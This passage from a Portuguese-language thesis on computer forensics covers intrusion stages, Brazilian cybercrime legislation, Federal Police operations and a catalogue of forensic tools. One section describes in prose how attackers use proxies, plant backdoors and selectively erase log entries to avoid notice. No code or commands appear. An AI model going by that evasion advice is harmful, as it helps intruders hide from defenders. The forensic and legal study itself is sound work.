visitando seu site, se for o caso, a vítima morando na mesma cidade, frequentar o local
de trabalho para saber melhor das atividades da empresa, como por exemplo, serviços
oferecidos, empregos, funcionários (lembrando que o ponto mais fraco do elo de
segurança fica nas mãos de seres humanos), etc. Depois de feito isso, existe duas
15
técnicas que poderão ser usadas nessa etapa, que seria a passiva e a ativa16. Nesse
15
Apenas a observação do que entra e sai das máquinas ou redes (ULBRICH; DELLA VALLE, 2006).
53
momento o mais importante é a coleta de informações, que possam ser o suficiente

para a elaboração de um plano de ação;
• Depois vem à parte mais importante do ataque, que pode ser tratada como o ataque
propriamente dito. Ao descobrir as vulnerabilidades e já feito um exame
comportamental da vítima, em geral é utilizado um exploit apropriado para que
consiga ganhar acesso ilimitado aquele determinado sistema. Ainda nessa fase, é
recomendável que se utilize um Proxy público, para que as pistas sejam camufladas;
• Ao ganhar o acesso ilimitado, a próxima etapa é ganhar acesso total à máquina. Cada
sistema operacional possui um procedimento diferente para esta atividade. Assim, ao
conseguir controle total, basta fazer a coleta das informações ou ainda se for o caso,
desconfigurar o sistema; e
• Ao término da captura, se torna essencial que o invasor camufle seus rastros, além de
criar Backdoors para facilitar uma próxima invasão. Para que isso ocorra, é necessário
que o invasor verifique os logs do sistema e apague o que for relativo à sua presença,
mas deve existir o cuidado de não se apagar tudo, pois deixaria um buraco e o
administrador notaria mais facilmente a ocorrência de algum problema. Em alguns
casos o cracker utiliza patches no sistema para remover as portas que o deixaram
entrar.
Esses são os passos geralmente utilizados em alguns dos ataques apresentados. É

possível a realização de invasões bem sucedidas, mas ao se tratar de um ataque ou invasão é
preciso antes ter um planejamento adequado e seguir uma sequência de escalabilidade, ou
seja, ir aos poucos ultrapassando as barreiras para que possa alcançar o objetivo de maneira
menos arriscada (ULBRICH e DELLA VALLE, 2006).
Na seção seguinte será apresentada a legislação brasileira, ainda um pouco defasada,
para os crimes cibernéticos.
16
Consiste em realizar mini ataques a pontos distintos, a fim de visualizar as mensagens que retornaram após
cada ataque (ULBRICH; DELLA VALLE, 2006).

54
2.6 LEGISLAÇÃO
Para Rohrman (2005), os seguintes termos “crimes de informática”, “crimes virtuais”

ou “crimes eletrônicos”, se referem a dois tipos de situação. Uma delas é o crime praticado
com a utilização de sistemas de computadores, que visa apenas um bem jurídico protegido,
que acaba sendo diferente ao próprio sistema de computador, como por exemplo,
transferência de fundos de uma conta para outra. A outra situação é quando o delito foi
cometido por meio do uso de computadores contra outros computadores, como por exemplo,
a utilização de um determinado computador para causar danos ao sistema de outro
computador. É necessário este tipo de classificação para auxiliar no momento da classificação
teórica do crime para um estudo mais cauteloso.
Na Figura 8, traz um gráfico retirado do CERT.br (2013d) no período entre janeiro a
março de 2013, apresenta as principais tentativas de fraude:
Figura 7 – Tentativas de fraudes reportadas.

Fonte: http://www.cert.br/stats/incidentes/2013-jan-mar/fraude.html
Na Figura 8, o gráfico mostra que as páginas falsas e os Cavalos de Tróia são as

principais fraudes reportadas ao CERT.br (20013d), outras fraudes aparece em terceiro lugar,
seguido pelos direitos autorais.
O Brasil, diferente de países como os Estados Unidos que possuem muitas leis que
tratam de maneira distinta os cibercrimes, recentemente implantou leis que tratam, de forma
específica, alguns destes delitos. Porém, muitos crimes ainda precisam ser julgados fazendo
analogia com alguma lei já existente.
55
Um exemplo, nesse caso de ataque a site, foi a realização de dois ataques realizados
por crackers ao sistema de inscrições, no ano de 2013, do Exame Nacional do Ensino médio
(ENEM) em seu último dia, informou a Agência Brasil, responsável pelo exame. Mas o
ministro da Educação, Aloizio Mercadante, informou que apesar de existirem os ataques o
processo não será prejudicado. (Olhar Digital, 2013).
Dentro da esfera de crimes virtuais, para Rohrman (2005), os delitos podem ser
classificados de duas formas principais:
• Crimes próprios de Informática – também denominados de crimes puros, são apenas

possíveis de serem praticados com o uso dos sistemas de computadores, mesmo
aqueles que usam um computador simples e não conectado a nenhuma rede. Exemplo
de crimes que se enquadram neste termo seria em tese17; e
• Crimes impróprios de Informática – também denominados de crime impuros. São
crimes cometidos independentemente do uso de computadores ou outro sistema
eletrônico. Onde esse sistema computacional é utilizado de maneira que seu ato
criminoso vai além do computador. Alguns exemplos que ajudam entender melhor
esse tipo de atividade ilícita podem ser considerados: o crime contra a honra,
praticados por meio de sistema de computador, crime de estelionato e apropriação
indébita, crimes contra o direito do autor, ameaçar uma pessoa através de e-mails,
exploração de jogos de azar de maneira acessível ao público, fazer qualquer tipo de
apologia a crimes ou criminosos, publicarem cenas de sexo explícito ou qualquer outra
imagem de conteúdo pornográfico, aonde venha envolver crianças e adolescentes.
Existem outras leis que tratam o ambiente virtual, mesmo não sendo totalmente
direcionados a eles, que segundo Souza Neto (2009), pode ser:
Liberdade de Pensamento – no texto do artigo 5°, IV e V da Carta Magna brasileira,

assegura qualquer manifestação de pensamento, porém, fornece o direito de resposta, além de
indenização por dano material, moral ou de imagem. É possível visualizar no trecho do artigo:
17
Acesso não autorizado em sistemas de computadores, aquisição de senhas, criação e a disseminação de vírus e
outros casos ocasionados principalmente pela rápida evolução técnica de seus idealizadores (ROHRMAN,
2005).
56
I V – é li vr e a ma n i f es taç ão d o p en sa me nto , se nd o ved ad o o

ano n i ma to ;
V – é a ss e g ur ad o o d i r eito d e r e sp o s ta, p r o p o r cio na l ao a gr a vo ,
alé m d a i nd e ni zaç ão p o r d a no ma ter ial , mo r a l o u à i ma g e m;
Racismo e Injúria Qualificada pelo Uso de Elemento Racial – no texto dos artigos
3°, IV; 4°, VIII; e 5°, XLII da CRFB, traz dispositivos que visam coibir tal prática:
Ar t. 3 ° Co n s ti t ue m o b j e ti vo s f u nd a me n ta is d a R ep úb li ca F ed er a ti v a
d o B r as il :
I V – p r o mo v er o b e m d e to d o s, se m p r eco n cei t o s d e o r i ge m, r a ça,
se xo , co r , id ad e e q ua i s q uer o utr a s f o r ma s d e d i scr i mi n ação ;
Ar t. 4 ° A R ep úb l ica Fe d er at i va d o B r a s il r e g e - se na s s ua s r e laçõ e s
in ter n ac io nai s p elo s se g ui n te s p r i nc íp io s:
VI I I – r ep úd io ao t er r o r i s mo e ao r a ci s mo ;
Ar t. 5 °.
X LI I – a p r á tic a d o r aci s mo co n sti t ui cr i me i na fi a nçá v el e
i mp r e scr it í ve l, s uj eito à p en a d e r ec l us ão , no s t e r mo s d a le i;
Dano – é previsto como crime de dano, indicado no artigo 163 do Código Penal, o
seguinte:
Ar t. 1 6 3 – D es tr ui r , i n u t ili zar o u d et er io r ar co i s a al h eia :

P ena – d et e nção , d e u m a s ei s me s es e mu l ta
Da no q ua li f ic ad o
Interceptação na Informática – segundo a constituição brasileira, visa proteger a

inviolabilidade da correspondência e das comunicações telegráficas, seja elas de dados e
comunicações telefônicas, no seu art. 5°, XII:
XI I – é in v io l á vel o s i g ilo d a co r r e sp o nd ê n ci a e d as co mu n i ca çõ e s
tel e gr á f ica s, d e d ad o s e d as co mu n ic açõ e s tel efô n ic as, sa l vo , no
úl ti mo ca so , p o r o r d e m j ud ic ia l, na s h ip ó t e se s e na fo r ma q u e a le i
es tab e lec er p ar a fi n s d e in v e st i gaç ão cr i mi n al o u i ns tr uç ão p e na l;
A lei n° 9.296/96, regulamenta a parte final do inciso XII da Constituição, onde fez
uma extensão para a informática, em seu art. 1°, de Parágrafo Único:
Ar t. 1 ° A i n ter c ep t ação d e co mu n i caç õ e s t ele f ô ni ca s, d e q ualq u er

na t ur e za, p ar a p r o va e m i n v e st i gação cr i mi na l e e m i n s tr ução
p r o ce ss u al p e na l, o b s er var á o d isp o s to ne s ta L ei e d ep e nd er á d e
o r d e m d o j u iz co mp e te n t e d a a ção p r i nc ip al , so b se gr ed o d e j us ti ça.
57
P ar ág r a fo Ú n ico . O d i s p o sto ne st a Lei ap li ca - s e à in ter cep t ação d o

f l u xo d e co mu n i caçõ es e m s is te ma s d e i n fo r má ti ca e te le má ti ca.
E ainda prevê a Lei n° 9.296/96 no art. 10, uma punição para aquele que interceptar
comunicações de informática:
Ar t. 1 0 . Co n s ti t ui cr i m e r ea liz ar i n ter c ep t açõ e s d e co mu n ic açõ e s

tel e fô ni ca s, d e i n fo r má tic a o u te le má t ica , o u q ueb r ar se gr ed o d e
J u st iça, s e m a u to r i zaç ã o j ud ic ia l o u co m o b j et ivo s n ão a u to r i zad o s
e m le i.
P ena : r e cl u são , d e d o is a q uatr o a no , e mu l ta.
No ano de 2012, foram sancionadas duas leis voltadas para os crimes virtuais, a lei
12.735 e a 12.737, que serão descritas a seguir (PLANALTO, 2012):
Práticas contra os sistemas informatizados – a lei 12.735 tipifica como crime ações
realizada mediante o uso de sistema eletrônico, como fica descritos no 1° e 4° parágrafos:
Ar t. 1 o E s ta Le i al ter a o Decr eto - L ei no 2 .8 4 8 , d e 7 d e d eze mb r o

d e 1 9 4 0 - Có d i go P e na l , o Decr eto - L ei no 1 .0 0 1 , d e 2 1 d e o ut ub r o
d e 1 9 6 9 - Có d i go P e na l Mil it ar , e a Le i no 7 .7 1 6 , d e 5 d e j a ne ir o d e
1 9 8 9 , p ar a tip i fi car co nd u ta s r ea li zad a s me d i an te u so d e s i ste ma
ele tr ô ni co , d i gi ta l o u si mi lar e s, q u e s ej a m p r atic ad a s co ntr a
si s te ma s i n fo r ma ti zad o s e s i mi lar e s; e d á o u tr a s p r o v id ê nc ia s.
Ar t. 4 o Os ó r gão s d a p o líc ia j ud ici ár i a e s tr ut ur ar ão , no s ter mo s d e

r eg u la me n to , s eto r es e eq u ip e s esp ec ial izad a s no co mb a te à a ção
d eli t uo sa e m r ed e d e co mp u tad o r e s, d isp o s it i vo d e co mu n ic ação o u
si s te ma i n fo r ma t izad o .
Invasão de dispositivo informático – a lei 12.737 tipifica como crime invadir

dispositivo informático alheio, como fica descritos no artigo 154-A e 154-B:
Ar t. 1 5 4 - A. I n v ad ir d i sp o si ti vo i n f o r má tico a lh eio , co nec tad o o u

não à r ed e d e co mp ut ad o r e s, med ia nt e v i o lação i nd e vid a d e
me ca n is mo d e se g ur a n ça e co m o fi m d e o b t er , a d ul ter ar o u d e st r uir
d ad o s o u i n fo r ma çõ e s s e m a u to r iz ação e xp r e s sa o u tá ci ta d o t it u lar
d o d isp o s it i vo o u i n s t alar v u l ner ab i lid ad es p ar a o b t er va n ta ge m
ilí ci ta :
P ena - d e te nç ão , d e 3 ( tr ês) me se s a 1 ( u m) a no , e mu l ta.
§ 1 o N a me s ma p e n a i n co r r e q u e m p r o d uz , o fe r ece, d i str ib ui, ve nd e
o u d i f u nd e d isp o s it i vo o u p r o gr a ma d e co mp ut ad o r co m o i n t ui to d e
p er mi tir a p r á ti ca d a co n d ut a d e f i nid a no c ap ut.
§ 2 o Au me n ta - se a p e na d e u m se xto a u m ter ço se d a i n va s ão
r es u lta p r ej uízo eco nô m ico .
§ 3 o Se d a i n va s ão r es ul tar a o b t e nção d e co nt e úd o d e
co mu n ic açõ e s el etr ô n i cas p r i vad a s, se gr ed o s co mer cia i s o u
58
ind u s tr i ai s, i n fo r ma çõ e s s i gi lo s as , as s i m d e fi nid a s e m le i, o u o
co n tr o l e r e mo to não a ut o r izad o d o d i sp o si ti vo i n vad id o :
P ena - r ec l us ão , d e 6 ( se is) me se s a 2 ( d o i s) ano s, e mu l ta, se a
co nd u ta n ão co n st it u i cr i me ma i s gr a v e.
§ 4 o Na hip ó te se d o § 3 o , au me nt a -s e a p e na d e u m a d o is ter ço s se
ho u ver d i v u l ga ção , co me r ci al iza ção o u t r a n s mi s s ão a ter ce ir o , a
q ua lq uer tí t ulo , d o s d ad o s o u i n fo r ma çõ e s o b t id o s.
§ 5 o Au me n ta - s e a p e na d e u m ter ço à me t ad e se o cr i me fo r
p r ati cad o co ntr a :
I - P r es id e n te d a Rep úb l ica, go v er nad o r es e p r e f eito s ;
I I - P r es id e n te d o S up r e mo T r ib u na l Fed e r al ;
I I I - P r e s id e nt e d a Câ m ar a d o s Dep u tad o s, d o Se nad o Fed er al, d e
As se mb le ia L e gi sl at i va d e E s tad o , d a C â m ar a Le g i sla ti v a d o
Di str ito F ed er a l o u d e C â mar a M u ni cip a l; o u
I V - d ir i ge n te má x i mo d a ad mi n is tr aç ão d ir e ta e ind ir e ta fed er al,
es tad ua l, mu n i c ip al o u d o Di st r it o F ed er a l.
Ar t. 1 5 4 -B . No s cr i m es d e f i nid o s no ar t . 1 5 4 - A, so me n t e se
p r o ced e med ia n te r ep r e s en taç ão , sal vo s e o cr i m e é co me tid o co ntr a
a ad mi n is tr a ção p úb l ica d ir et a o u i nd ir eta d e q ua lq uer d o s P o d er e s
d a U nião , E s tad o s, D is tr i to F ed er a l o u M u ni cíp io s o u co n tr a
e mp r e sa s co n ce ss io nár ia s d e s er viço s p úb li co s .”
Ar t. 3 o O s a r t s. 2 6 6 e 2 9 8 d o De cr e to - Le i no 2 .8 4 8 , d e 7 d e
d eze mb r o d e 1 9 4 0 - Có d igo P e na l, p a ss a m a v i g o r ar co m a se g ui n te
r ed ação :
“I n ter r up ção o u p er t ur b ação d e ser v iço te le gr á f ico , t el e fô nico ,
in f o r má tico , t ele mát ico o u d e i n fo r mação d e u ti l id ad e p úb li ca”.
Os artigos 266 e 298 passaram a vigorar com uma nova definição, vindo completar a
lei 12.737:
Ar t. 2 6 6 .
§ 1 o I nco r r e n a mes ma p en a q u e m i nte r r o mp e s er v iço t ele mát ico o u
d e in f o r maç ão d e u ti lid ad e p úb li ca, o u i mp ed e o u d i fi c ul ta - l he o
r es tab e lec i me n to .
§ 2 o Ap l ica m- s e a s p e na s e m d o b r o se o cr i me é co me tid o p o r
o cas ião d e c ala mid ad e p úb l ic a.”
“Fa l si f ica ção d e d o c u me nto p ar tic u lar
Ar t. 2 9 8 .
Fal s i fi caç ão d e car tão
P ar ág r a fo ú ni co . P ar a f i ns d o d isp o s to no c ap u t, eq u ip ar a -s e a
d o cu me n to p ar t ic u lar o car t ão d e cr éd i to o u d éb ito .”
Como dito anteriormente, a falta de mais leis específicas para os crimes no ambiente
da informática, tanto para Ulbrich e Della Valle (2006) quanto para Souza Neto (2009), acaba
sendo um grande problema, que para tentar driblar essas dificuldades e brechas, é preciso
utilizar de maneira análoga leis presentes no Código Penal Brasileiro.
Na seção seguinte é possível visualizar quais as ações da policia federal foram
realizadas, na maior parte, pelo envolvimento de dinheiro e pedofilia infantil.
59
2.7 OPERAÇÕES DA POLÍCIA FEDERAL
A seguir serão apresentadas algumas ações da polícia federal, segundo Galvão

(2009):
• Cash Net: ocorreu em 07 de novembro de 2007, envolveu dois estados, causou a

prisão de 17 pessoas, e cerca de U$ 46 milhões roubados;
• Cavalo de Tróia: ocorreu em 5 de novembro de 2003, nas cidades do: Pará, Maranhão,
Teresina e Ceará, causando a prisão de 54 pessoas, cerca de U$ 14 milhões roubados;
• Cavalo de Tróia II: ocorreu em 20 de outubro de 2004, nas cidades do: Pará,
Maranhão, Tocantins e Ceará, causando a prisão de 77 pessoas, cerca de U$ 110
milhões roubados;
• Matrix: ocorreu em março de 2005, na cidade de Rio Grande do Sul, causando a prisão
de oito pessoas;
• Anjo da Guarda I: ocorreu em julho de 2005, na cidade de Volta Redonda (RJ),
causando a prisão de 8 pessoas;
• Anjo da Guarda II: ocorreu em setembro de 2005, nos estados do: PR, SP e MA;
• Pegasus: ocorreu em setembro de 2005, nas cidades de Goiás, Tocantins, Pará, ES, SP
e MG, causando a prisão de 127 pessoas, e um roubo de cerca de U$ 33 milhões;
• Galácticos: ocorreu em agosto de 2006, na cidade de Imperatriz (MA), causando a
prisão de 65 pessoas;
• Replicante: ocorreu em setembro de 2006, na cidade de Goiânia (GO), causando a
prisão de 60 pessoas;
• CTRL ALT DEL: ocorreu em dezembro de 2006, no Pará, causando a prisão de 39
pessoas;
• Operação Scan: ocorreu em 14 de fevereiro, envolvendo 7 estados brasileiros, resultou
na prisão de 63 pessoas, e um roubo de cerca de U$ 4.7 milhões;
• Carrossel: ocorreu em dezembro de 2007, onde foi uma ação contra a pedofilia, que
ocorreu em 14 estados no Brasil e em mais 78 países.
60
2.8 TRABALHOS RELACIONADOS
Existem trabalhos que abordam o tema da perícia forense, os que se aproximam deste
trabalho de conclusão de curso poderão ser vistos a seguir:
2.8.1 Análise Forense em sistemas GNU/Linux
No trabalho desenvolvido por Argolo (2005), são fornecidas algumas explicações

dentro desta área de perícia forense.
Ele aborda as habilidades que um intruso possui para que um ataque se concretize,
desde como levantar as informações necessárias para a realização até limpeza de seus rastros
após a concretização. Apresenta também um breve perfil de cada tipo de atacante.
Faz uma apresentação sobre a legislação e como ela trata os crimes cometidos no
mundo virtual. Porém, seu conteúdo não apresenta as duas novas leis que saíram
especificando e tratando esses delitos, já que foram decretados no ano de 2012.
O autor trata também sobre a coleta de informações, porém, com um enfoque maior na
área de servidores, diferentemente deste trabalho que tem como foco a análise das ferramentas
forenses em cima dos ataques efetuados em computadores pessoais.
Em seguida faz uma apresentação das ferramentas forenses e como elas se comportam
de maneira prática nos cenários criados por ele.
E por fim, traz uma conclusão de seu trabalho fazendo um apanhado de todo o
conteúdo e apresenta os resultados obtidos durante a realização do mesmo.
2.8.2 Análise Forense de Intrusões em Sistemas Computacionais: Técnicas,
Procedimentos e Ferramentas
O trabalho apresentado a seguir foi desenvolvido por Reis e Geus (2002), que também
traz conhecimentos dentro da área de perícia forense.
61
Assim como Argolo (2005), eles apresentam as habilidades de um invasor, como ele
age e faz uma classificação em cima de cada um desses criminosos traçando um perfil em
cima de seus conhecimentos.
Mostra como e onde podem ser encontrados os dados necessários durante uma
investigação. Diferentemente do autor citado anteriormente, eles abordam como correlacionar
as evidências encontradas.
Apresenta como é um processo de investigação e quais são os cuidados que é preciso
ter nesse momento, desde seu planejamento até sua análise.
Em seguida trazem algumas ferramentas de perícia forense, cuja algumas são iguais
apresentadas no trabalho de Argolo (2005).
E por fim mostra a conclusão de seu trabalho baseando-se em todo o conteúdo descrito
até o termino do mesmo.
2.8.3 Perícia Forense Aplicada à Informática
O trabalho desenvolvido por Freitas (2003), como nos dois trabalhos mencionados
aqui, dos autores Reis e Geus (2002) e Argolo (2005), apresenta o tema de perícia forense.
O trabalho descreve o funcionamento de uma perícia forense, desde sua análise
pericial até uma análise física, que consiste na pesquisa de sequência, a busca e extração dos
dados e onde podem ser encontradas tais informações.
Assim como Argolo (2005), seu trabalho é voltado para servidores web, abordando
assim de uma maneira mais aprofundada.
Como é possível visualizar, os trabalhos apresentados que tratam sobre o tema de

perícia forense, trazem como os atacantes agem, onde é possível encontrar as informações
necessárias à coleta de dados, faz uma apresentação das ferramentas, mudando muitas vezes
apenas o foco de sua pesquisa, como por exemplo, aqueles que falam sobre ataques a
servidores web ou como é o caso deste trabalho, abordam os ataques a computadores pessoais.
O presente trabalho apresenta um levantamento das principais ferramentas e técnicas
utilizadas durante a perícia forense, traz novas leis que tratam o crime virtual de maneira
específica, além do estudo de caso comparando algumas ferramentas.
Capítulo
63
3 METODOLOGIA
Nesta seção serão apresentadas as ferramentas para análise forense, onde separadas
por funcionalidades oferecidas e, em seguida, a apresentação de uma análise experimental
através da criação de cenários para utilização das ferramentas.
3.1 FERRAMENTAS DE PERÍCIA FORENSE
Para a realização de uma perícia hoje, existem muitas ferramentas que podem fazer a
captura das informações, de maneira automatizada, sendo elas livres, de código fonte aberto
ou as ferramentas proprietárias. Para auxiliar em uma possível escolha, as ferramentas serão
separadas por tipo, ou seja, o que os idealizadores destes softwares se comprometem em
realizar ao desenvolvê-las.
Será apresentada uma lista de ferramentas abaixo, tais softwares poderão servir tanto
para sistemas Windows™, UNIX/Linux e Mac.
3.1.1 Ferramentas para a Recuperação de Dados no HD:
Apresenta-se, nesta seção, um conjunto de ferramentas para a recuperação de dados no

HD:
Data Compass18: ferramenta produzida pela empresa SalvationDATA, traz como

proposta recuperar dados de HDs danificados fisicamente, ou seja, mesmo que vários setores
estejam danificados consegue restaurar, além de resolver a o mau funcionamento ou
instabilidade do conjunto da cabeça magnética. Trabalha com os seguintes sistemas de
arquivos: FAT, NTFS, HFS, HFX, HFS +, Ext2, Ext3 e qualquer outro sistema de arquivo
18
http://www.salvationdata.com/data-recovery-equipment/data-compass.htm
64
existente. Está ferramenta é paga, cujo valor é de $1.500,00. Na Figura 7 é apresentada uma
imagem da ferramenta;
Forense Add-On for DeepSpar Disk Imager19: ferramenta produzida pela empresa
DeepSpar Data Recovery Systems, sua proposta além de recuperar os dados, é ter um enfoque
na área forense. Fornece suporte para relatórios de perícia, cujo conteúdo é separado por
arquivo de imagem, contendo: seu caminho absoluto, o nome do arquivo, seu tamanho, data
de criação e modificação, o número total de setores utilizados, quais setores estão danificados
e quais ainda se mantém íntegros, localização de todos os fragmentos de arquivos e muitas
outras funcionalidades;
PSIClone20: ferramenta produzida pela empresa CPR Tools, cuja proposta é realizar a
recuperação de dados que foram alegados como irrecuperáveis. Faz uma clonagem de um
disco para o outro, possibilita uma compressão robusta dos dados, além de possibilitar que o
usuário pare a coleta e volte no mesmo lugar quando retomar a captura. O preço de venda é de
$1.999,00, segundo anúncio no site da empresa;
Figura 8 – Equipamento para a recuperação de HD – Data Compass.

Fonte: http://www.salvationdata.com/data-recovery-equipment/dc-introduction/index.html
Guymager21: gera imagens de mídias, dentre as principais características, pode ser

destacado a interface de usuário que roda em diversas linguagens de maneira fácil de ser
19
http://www.deepspar.com/forensics-ds-disk-imager.html
20
http://www.thepsiclone.com
21
http://guymager.sourceforge.net
65
entendida, compressão de dados multi-threaded, pipeline, faz uso de máquinas de múltiplos

processadores e suporta clonagem de disco. Não existem custos para a aquisição da
ferramenta, pois, é totalmente open source (código aberto). Ferramenta voltada para a
plataforma GNU/Linux;
AIR22: também conhecida como Automated Image and Restore – Restauração e
Automatização de Imagem (AIR). Uma ferramenta desenvolvida por Steve Gibson e Bassetti
Nanni. Entre as características do produto estão a verificação de imagem entre fonte e cópia,
limpeza de unidades ou partições, imagens divididas em vários segmentos, log detalhado com
data e complementada por linhas de comandos usados, entre outras funcionalidades. É uma
ferramenta de código aberto, voltada para a plataforma GNU/Linux;
ProDiscover Forense23 – a ferramenta apresenta como proposta a captura das
informações do disco e, ao mesmo tempo, protegendo e criando relatórios de qualidade como
forma de uso para provas em processos judiciais. Não é gratuita. Ferramenta voltada para a
plataforma Windows™;
24
P2 Commander – uma ferramenta criada pela empresa Paraben Corporation. O P2
Commander é, na realidade, um conjunto de ferramentas que auxilia em uma perícia, dentre
elas podem ser vistas, E-mail Examiner (uma ferramenta de exame para e-mails), Network E-
mail Examiner (examina grandes redes de e-mail), Chat Examiner (examina arquivos de log
de bate-papo), Registry Analyzer (faz uma análise detalhada dos arquivos de registro do
Windows™) e Forensic Sorter. Ferramenta voltada para a plataforma Windows™ (organiza os
discos rígidos inteiros por tipos de arquivos);
FTK 25– ferramenta conhecida como Forensic Toolkit (Kit de Ferramentas Forenses).
Criada pela empresa AccessData Digital Forensics Software, traz a possibilidade de expansão
contínua, ou seja, fornece o suporte para agregar novas ferramentas que o investigador posa
utilizar em algum momento. Dentre os recursos disponíveis no conjunto pré-fornecido está o
Cerberus, é uma ferramenta que realiza uma engenharia reversa no código malicioso, a fim de
determinar o comportamento e a intenção dos binários do malware. Ferramenta voltada para a
plataforma Windows™. O custo para aquisição de tal conjunto de recursos é de $12.500,00;
22
http://sourceforge.net/apps/mediawiki/air-imager/index.php?title=Main_Page
23
http://www.techpathways.com/ProDiscoverDFT.htm
24
http://www.paraben-forensics.com/harddrive-forensics.html
25
http://www.accessdata.com/products/digital-forensics/ftk
66
3.1.2 Ferramentas para a Recuperação de Dados:
Apresenta-se, nesta seção, um conjunto de ferramentas para a recuperação de dados:
26
Stellar Phoenix NTFS Data Recovery – criado pela empresa Stellar Data Recovery.
Esta ferramenta recupera dados de arquivos perdidos, pastas, fotos, vídeos, documentos e e-
mails. Compatível com o Windows™ 7, Vista, Server 2003, XP, 2000 e NT4. É uma
ferramenta paga e voltada unicamente para os sistemas operacionais do Windows™;
EASEUS Recovery Software27 – criada pela empresa EaseUS. A ferramenta recupera e
restaura partições perdidas ou danificadas, de maneira rápida. Pode recuperar partições na
maioria dos discos rígidos existente, como por exemplo, discos com conexão Integrated Drive
Eletronics – Controladora Integrada (IDE), Advanced Technology Attachment – Acessório de
Tecnologia Avançado (ATA), Serial Advanced Technology Attachment – Acessório de
Tecnologia Avançado Serial (SATA) e Small Computer System Interface – Interface Pequena
para Sistema Computacional(SCSI), além de ser fácil de usar e tenta reduzia a chances de
cometer erro. Fornece suporte para FAT, NTFS, Ext2/Ext3. É uma ferramenta livre;
Data recovery software 28– criada pela empresa CnW Recovery. A ferramenta recupera
dados de discos corrompidos, discos que falharam parcialmente, fotos que foram excluídas de
chips de memória flash, compatível com Windows™ 8, Windows™ 7, XP e suporte para
RAID. A licença da ferramenta custa $19,90, mas se optar por adicionar ferramentas forenses
o pacote chega a $189,90;
FreeRecover29 – é um programa que recupera arquivos da unidade NTFS, gera
previews dos arquivos apagado, fornece uma estimativa da integridade dos arquivos
encontrados e pesquisa instantânea de arquivos apagados. A ferramenta é livre;
Scalpel30– esta ferramenta auxilia em investigações forenses, pois realiza a
recuperação de arquivos, sendo em FAT, NTFS, Ext2 ou Ext3. Tal ferramenta atende a
plataforma Linux melhor que as plataformas Windows™ e Mac OS X, além de ser livre.
26
http://www.stellarinfo.com/recover-windows-nt.htm
27
http://www.ptdd.com/index.htm
28
http://www.cnwrecovery.com
29
http://sourceforge.net/projects/freerecover/
30
http://www.digitalforensicssolutions.com/Scalpel
67
3.1.3 Ferramentas para Análise de Arquivo:
Apresenta-se, nesta seção, um conjunto de ferramentas para a análise de arquivos:
Code Suite31– é um conjunto de ferramentas desenvolvidas pela empresa Software

Analysis and Forensic Engineering, que contempla as seguintes ferramentas: BitMatch,
CodeCross, CodeDiff, CodeMach e SourceDetective. Tal conjunto compara e analisa os dados
a fim de encontrar violações de direitos autorais e roubo de segredos comerciais. Se o
conjunto de códigos for pequeno, o site disponibiliza a ferramenta de forma gratuita, enquanto
que se o código tiver mais de 1 megabyte é preciso adquirir uma licença para a utilização do
mesmo;
SurfRecon Pornography-Detection Software32 – criada pela empresa SurfRecon, a
ferramenta busca por conteúdo pornográfico além do computador, como também em Compact
Disc-Read Only Memory – Disco Compacto – Memória Somente de Leitura (CD-ROM),
Digital Video Disc – Disco Digital de Vídeo (DVD) ou pen drive, existindo o conteúdo ele
detecta, classifica e exibe o item. Exceuta independente do sistema operacional. É uma
ferramenta paga;
The Open Computer Forensics Architecture33 - criada pela Agência Nacional da
Polícia Holandesa, a ferramenta tem como objetivo automatizar o processo forense em
ambiente digital, de tal forma que acelere a investigação e dar acesso direto aos dados
capturados através de uma interface amigável e de fácil pesquisa;
P2P Marshal34 - criada pela empresa Architecture Technology Corporation, a
ferramenta analisa o compartilhamento de arquivos de software em um disco. Roda em
Windows™, mas como é baseado na plataforma Java para o seu desenvolvimento, é capaz de
rodar em outros sistemas operacionais.
31
http://www.safe-corp.biz
32
http://www.surfrecon.com/products/elite-edition.php
33
http://ocfa.sourceforge.net
34
http://www.p2pmarshal.com/
68
3.1.4 Ferramentas para a Extração de Metadados de Documentos:
Apresenta-se, nesta seção, um conjunto de ferramentas para a extração de metadados

de documentos:
ExifTool35– programa escrito por Phil Harvey, é uma ferramenta multiplataforma de

licença gratuita que fornece a oportunidade de realizar uma leitura, escrita ou a edição de
informações de metadados em uma grande variedade de arquivos, como por exemplo,
arquivos de texto, imagem, páginas de Internet, arquivos compactados e outros;
Metadata Extraction Tool36 – criado pela empresa National Library of New Zealand, é
uma ferramenta que busca extrair automaticamente metadados de maneira que sejam
preservados, pode ser capturada uma variedade de extensões de documentos, como por
exemplo, arquivos em Portable Document Format – Formato de Arquivo Portável (pdf),
fornece suporte também para arquivos de imagem e arquivos de som. Tal ferramenta foi
desenvolvida em linguagem Java e sua licença é gratuita;
ExifTags37 – é uma ferramenta livre que roda em sistemas Windows™ e UNIX, que
analisa arquivos de imagem, além de fornecer suporte a uma variedade de câmeras
fotográficas, como por exemplo, Canon, Panasonic, Nikon, e outras;
Directory Lister Pro38 – criada pela empresa KRKsoft, a ferramenta permite listar
arquivos de diretórios selecionados em disco rígido, como por exemplo, CD-ROM, DVD,
USB (Universal Serial Bus - Barramento Universal Serial) e compartilhamento de rede.
Funciona em sistemas Windows™, seu custo é de $29,00 ou gratuito para ser utilizado dentro
de 30 dias.
3.1.5 Ferramentas para Análise de Memória:
Apresenta-se, nesta seção, um conjunto de ferramentas para a análise de memória:
35
http://www.sno.phy.queensu.ca/~phil/exiftool/#supported
36
http://meta-extractor.sourceforge.net/
37
http://johnst.org/sw/exiftags/
38
http://www.krksoft.com/
69
The Volatility Framework39 – criada pela empresa Volatile Systems, é considerada uma
coleção de ferramentas de código aberto para a extração de artefatos de memória volátil.
Dentre as capacidades da ferramenta pode ser visto módulos do kernel do sistema
operacional, o mapeamento dos deslocamentos físicos para endereços virtuais, histórias de
comandos realizados, relatório sobre os serviços do Windows™, entre outras vantagens. Pode
ser executado em qualquer plataforma;
WindowsSCOPE CaptureGuard40 – uma ferramenta criada pela WindowsSCOPE
Forensics & Cyber Security Tools, uma subsidiária da BlueRISC. A ferramenta oferece a
chance de realizar uma engenharia reversa de um sistema Windows™ e tudo o que foi
executado diretamente na memória. Voltada para a plataforma Windows™, é adquirida
através de uma licença, de 3 meses cuja o valor é de $399,00 ou permanente que custa
$4.999,00.
3.1.6 Ferramentas para Análise de Log:
Apresenta-se, nesta seção, um conjunto de ferramentas para a análise de log:
Window Event Log Viewer41 – criado pela empresa TZWorks LLC, é uma ferramenta e
analisador de log, desde dispositivos USB´s que foram conectados, alterações de senhas e até
mudanças de credenciais. Voltadas para sistemas Windows™ e sua licença é gratuita;
Log Parser 2.242 – criada pela empresa Microsoft™, é uma ferramenta que analisa
